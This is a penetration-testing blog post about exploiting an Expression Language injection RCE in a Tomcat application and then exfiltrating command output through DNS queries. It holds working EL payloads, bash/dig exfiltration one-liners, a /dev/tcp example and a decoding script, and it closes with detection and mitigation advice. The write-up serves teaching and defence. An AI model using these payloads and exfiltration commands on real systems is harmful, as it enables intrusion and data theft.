Breaking, Building

DNS exfiltration case study

Recently, we came across a remote code execution vulnerability in a Tomcat web service via Expression Language (EL) injection. The vulnerable POST body field expected a number. When we sent ${1+2} instead, the web site included a Java error message about a failed conversion of the java.lang.String value "3" to java.lang.Long.

From that error message we learned a couple of things:

  • The application uses Java
  • We are able to execute EL expressions
  • Output from the EL engine is always returned as a String

Whenever you are able to execute code within a Java context, the most interesting next step is to check whether you can obtain a Runtime object and execute arbitrary OS commands.

Sending ${Runtime.getRuntime()} resolves to java.lang.Runtime@de30bb. Great, so we can use Runtime.exec(String cmd) to execute arbitrary code?

Well, we were not able to create any new object, so ${Runtime.getRuntime().exec("id")} would not work. As exceptions thrown during EL processing were not included in the rendered page, page generation simply stopped at the location of the error message. This made debugging hard, as we did not know whether a WAF filtered or encoded our payload, or whether the way the EL template was evaluated prevented the use of ".

The EL context allows access to some implicit objects, as defined in the documentation under Implicit Objects. One of these objects, param, seemed interesting, as it can be used to resolve request parameters into strings. One response later, we had successful command execution, as the output of ${Runtime.getRuntime().exec(param.cmd)} was java.lang.UNIXProcess@2f0a8ba. But was the execution of the command successful? What was its output? Java likes its factories and interfaces. That said, to read stdout of the UNIXProcess we would have to create a BufferedReader around an InputStreamReader that reads stdout of the subprocess.

One way to determine the success of the call is to check its return value. Given its nature, the return value is only available once the process has finished. Java’s Process interface provides a method int waitFor() that blocks the calling thread until the subprocess has finished. Its return value is the exit code of the subprocess.

After a small adjustment to the payload, we were able to see that ${Runtime.getRuntime().exec(param.cmd).waitFor()} paired with cmd=sleep+10 results in a response time of just over 10 seconds and an error message that "0" can’t be converted to a Long.
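The timing oracle can be reproduced locally; a minimal sketch (shortened to sleep 2 to keep it brief), assuming a GNU/Linux shell:

```shell
# A successful `sleep` both delays the response and exits with status 0,
# which is exactly what the waitFor() payload exposes to the attacker.
start=$(date +%s)
sleep 2
status=$?
elapsed=$(( $(date +%s) - start ))
echo "status=$status elapsed=${elapsed}s"
```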

But what about the output? I promised an article about DNS exfiltration. So far, we have only talked about an RCE in Tomcat. Given our situation, being unable to include the command output in the page source, we need to resort to out-of-band communication. The simplest way of doing so would be to check for curl, wget or netcat and just send an HTTP request to a server of ours.

To check for curl availability, we simply used our Burp Collaborator instance by requesting one payload URL. Before even taking a look at the Collaborator we knew that we had no success: waitFor showed the status code was 7, which for curl means "Failed to connect to host". Nevertheless, we checked the Collaborator, which showed only a successful DNS request to our server.

We quickly checked whether any DNS tool like nslookup, dig or drill was installed on the server by executing dig <domain>, which succeeded.

Extracting user information should be sufficient as a short PoC. Some bash magic later, we had our payload: id | base64 -w 60 | xargs -I ',' dig ,.<domain>. When executing this on the vulnerable application, we always received the return value 1, indicating an error, although everything worked on our machine. A small Java test program revealed the issue: Runtime.exec(String) does not pass the command to a shell. It merely tokenizes the string on whitespace, so shell metacharacters like | are passed to the program as literal arguments instead of being interpreted. For programs with arguments, Java provides Runtime.exec(String[]), where the first element is the program and the remaining elements are its arguments.
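The same distinction is easy to demonstrate in a shell: when | arrives as a plain argument it is not interpreted; only a shell turns it into a pipe. A quick sketch:

```shell
# "|" passed as a literal argument: echo just prints it, nothing is piped
echo 'id |' base64

# The same string handed to a shell: the pipe is interpreted
bash -c 'echo hello | base64'
```

This mirrors the cmd=bash&cmd=-c&cmd=<payload> parameter set used later: the shell, not Java, interprets the pipes.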

Onward to the next issue. EL did not allow us to write something like ${Runtime.getRuntime().exec(new String[]{param.one, param.two, ...})}. In hindsight, we maybe could have used the implicit paramValues object, but we totally missed that. We instead used pageContext.request.getParameterValues(name), which returns an array containing all values of the parameter specified by name. The final payload was

${Runtime.getRuntime().exec(pageContext.request.getParameterValues(param.name))}

with the parameters name=cmd and cmd=bash&cmd=-c&cmd=<payload>. Using this generic approach, we built some scripts to automate the process by setting the correct parameters and appending our exfiltration payload to each command.

In the following I will explain the basics of DNS exfiltration, the setup used and the commands we used to transmit and parse the domain names.

The basics

DNS exfiltration uses DNS requests to send data and can be used in rare situations where “normal” Internet traffic is either blocked or filtered. As DNS requests can propagate through DNS resolvers, even if the system requesting the domain name cannot reach the DNS server directly, it might still be possible to extract data through this channel.

The basic idea is to encode data in a domain-safe way and send it through DNS requests to the attacker’s DNS server.
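As a minimal sketch of that encoding step (exfil.example.com stands in for the attacker-controlled domain):

```shell
# Encode a secret and print the DNS names that would be queried.
# Note: plain base64 may emit '+', '/' and '=', which are not strictly
# hostname-safe, but resolvers generally still forward such queries.
SECRET='db_password=hunter2'

# -w 60 keeps each chunk below the 63-byte DNS label limit
printf '%s' "$SECRET" | base64 -w 60 | while read -r chunk; do
    echo "would query: ${chunk}.exfil.example.com"
done
```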

The setup

Given an already exploited target, we need some tool on the target that creates DNS requests. This can be a dedicated program like dig or drill, but any networking tool such as wget, curl, netcat, host, or even bash -c "echo test > /dev/tcp/$host/$port" will do.

On the receiving end we need a publicly reachable server with UDP port 53 not being blocked. Any VPS should be suitable for this. Even some ISPs allow port forwarding on private Internet connections.

To instruct DNS resolvers to send requests to our server, we need to set an NS record on a domain we control, pointing to our server's IP.

Lastly, we need to listen on the receiving server on port 53 UDP and parse incoming requests.

Is there any tooling?

During our project we just needed a PoC, therefore only some bash scripts exist that basically boil down to the payload described above plus some parsing.

The final exfiltration command has been improved to support ordering. It does require some more tools, but these are very basic and should be available on most default Linux installations.

<cmd> | base64 -w 60 | cat -n | awk '{$1=$1};1' | sed 's/ /\n/' | xargs -L 2 -n 2 bash -c 'dig $1.$0.<domain>'

In detail:

  • We run the command
  • We pipe its output into base64 with a line length below 63 characters (the DNS label limit) that is divisible by 4 (base64 stores 3 bytes in 4 characters)
  • Using cat -n, each line is prefixed with its respective line number
  • The awk call removes any leading whitespace
  • Using sed, we split the line number and content into two separate rows
  • With xargs, we pass two lines as the two parameters to bash
  • We create a call to dig formatted as <data>.<line no>.<domain>
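To inspect what this pipeline generates without any network access, dig can be swapped for echo; a dry run with a placeholder domain (using -n 2 alone, which is sufficient here since each record is exactly two lines):

```shell
# Dry run of the exfiltration pipeline: print the dig calls that
# would be executed. exfil.example.com is a placeholder for <domain>.
printf 'some longer fake command output that spans two base64 lines\n' \
  | base64 -w 60 \
  | cat -n \
  | awk '{$1=$1};1' \
  | sed 's/ /\n/' \
  | xargs -n 2 bash -c 'echo dig "$1.$0.exfil.example.com"'
```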

To capture the DNS requests we simply started tcpdump for port 53 UDP. When running e.g. id we would get output similar to the following:

16:44:24.860040 IP XXX.XXX.XXX.XXX.47679 > YYY.YYY.YYY.YYY.53: 61071 [1au] A? dWlkPTEwMDAoaG56bG1ubikgZ2lkPTk4NSh1c2VycykgZ3JvdXBzPTk4NSh1.1.<domain>. (103)
16:44:24.887303 IP XXX.XXX.XXX.XXX.39556 > YYY.YYY.YYY.YYY.53: 2045 [1au] A? c2VycyksNTQobG9jayksOTgocG93ZXIpLDEwOCh2Ym94dXNlcnMpLDE1MCh3.2.<domain>. (103)
16:44:25.050284 IP XXX.XXX.XXX.XXX.45014 > YYY.YYY.YYY.YYY.53: 34349 [1au] A? aXJlc2hhcmspLDk3MyhsaWJ2aXJ0KSw5ODYodmlkZW8pLDk4Nyh1dWNwKSw5.3.<domain>. (95)
16:44:25.080283 IP XXX.XXX.XXX.XXX.45614 > YYY.YYY.YYY.YYY.53: 34497 [1au] A? ODgoc3RvcmFnZSksOTk1KGF1ZGlvKSw5OTgod2hlZWwpCg==.4.<domain>. (95)

Depending on the DNS configuration there can be more than one request per domain name. For a better overview I stripped out these duplicates in the above output. Also, the requests might not be received in the correct order.

To take care of the sorting and removal of duplicates, we used the following one-liner:

cat $1 | egrep -o '[^ ]*\.<domain>' | sed 's/\.<domain>//' | sed 's/\./\t/' | sort -k2 -n | uniq | sed 's/\t.*//' | tr -d "\n" | base64 -d

Which does the following things:

  • Extract the domain names ending with our specified domain
  • Remove the domain part
  • Split each line at the first . by replacing it with a tab, separating data and line number
  • Sort all entries by the second column (the line number)
  • Remove all duplicates
  • Delete the line number
  • Concatenate all lines into one
  • Base64-decode the data

For our example above this would result in:

uid=1000(hnzlmnn) gid=985(users) groups=985(users),54(lock),98(power),108(vboxusers),150(wireshark),973(libvirt),986(video),987(uucp),988(storage),995(audio),998(wheel)
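The parsing steps can be verified offline by feeding the four captured names from above through the same pipeline (with <domain> substituted by the placeholder exfil.example.com):

```shell
# The four query names captured above, written to a file as a
# stand-in for the tcpdump output.
cat > captured.txt <<'EOF'
dWlkPTEwMDAoaG56bG1ubikgZ2lkPTk4NSh1c2VycykgZ3JvdXBzPTk4NSh1.1.exfil.example.com.
c2VycyksNTQobG9jayksOTgocG93ZXIpLDEwOCh2Ym94dXNlcnMpLDE1MCh3.2.exfil.example.com.
aXJlc2hhcmspLDk3MyhsaWJ2aXJ0KSw5ODYodmlkZW8pLDk4Nyh1dWNwKSw5.3.exfil.example.com.
ODgoc3RvcmFnZSksOTk1KGF1ZGlvKSw5OTgod2hlZWwpCg==.4.exfil.example.com.
EOF

# Extract, sort by line number, strip the numbering, reassemble, decode
grep -oE '[^ ]*\.exfil\.example\.com' captured.txt \
  | sed 's/\.exfil\.example\.com//' \
  | sed 's/\./\t/' \
  | sort -k2 -n \
  | uniq \
  | sed 's/\t.*//' \
  | tr -d '\n' \
  | base64 -d
```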

Because creating the bash scripts was painful, they used hard-coded domains, and there was no way to run multiple commands in parallel without mixing up the requests, I created Dora the DNS explorer. Dora uses scapy to sniff on an interface, parses each DNS request received and stores it in a database. To separate different command outputs from each other, I introduced another part of the domain called context. Using Swiper, the extraction part of the tool, you are able to generate exfiltration payloads for different tools, or simply generate a new context to use in custom payloads.

How can I detect DNS exfiltration?

DNS exfiltration, just like any other exfiltration channel, can be detected by observing the amount of data transferred through a channel over a given period of time. If an attacker starts exfiltrating through DNS, the system will suddenly show an increased amount of outgoing DNS traffic. What if the web application does a lot of communication with other APIs or polls data from the Internet? Well, even if the application queries many APIs on the Internet, the number of distinct domain names queried should stay low, whereas an attacker exfiltrating data needs to request many distinct domain names, each representing a portion of the data.

Which metrics can be interesting?

When trying to identify malicious activities, two metrics are of interest from our point of view:

  • How many unique requests are sent from one client
  • How many unique requests per SLD (second-level domain) are sent
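The second metric can be approximated with standard tools. A toy sketch over a fake query log, naively treating the last two labels as the registered domain (exfil.example.com plays the attacker's domain):

```shell
# Toy DNS query log: one queried name per line. An application talking
# to an API repeats the same name; exfiltration yields many unique names.
cat > queries.log <<'EOF'
api.github.com
api.github.com
api.github.com
aGVsbG8.1.exfil.example.com
d29ybGQ.2.exfil.example.com
Zm9vYmE.3.exfil.example.com
EOF

# Count unique query names per registered domain
awk -F. '{print $(NF-1)"."$NF"\t"$0}' queries.log \
  | sort -u \
  | awk -F'\t' '{count[$1]++} END {for (d in count) print count[d], d}' \
  | sort -rn
```

The exfiltration domain stands out with one unique name per transmitted chunk, while the legitimate API traffic collapses to a single name.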

Depending on your security concerns, there are multiple approaches. Only logging successful DNS requests may not be sufficient.

Have a look at Evernote’s bro script collection for inspiration.


Servers that do not need to connect to other hosts do not need a DNS server configured. For internal hostnames, an internal DNS server that does not forward requests to upstream servers can be used.

If the service needs to resolve hostnames on the Internet, monitoring should be set up to detect and analyze exfiltrated data. If the domains the server needs to resolve are known and do not change, a whitelist can also be set up.


Dora the DNS explorer is still a work in progress and does not include many features yet. It should still be sufficient to capture, store and extract DNS requests. If you are missing a critical feature such a tool definitely needs, feel free to reach out to me.

If you happen to be at TROOPERS20, we can have a chat over a beer 😉

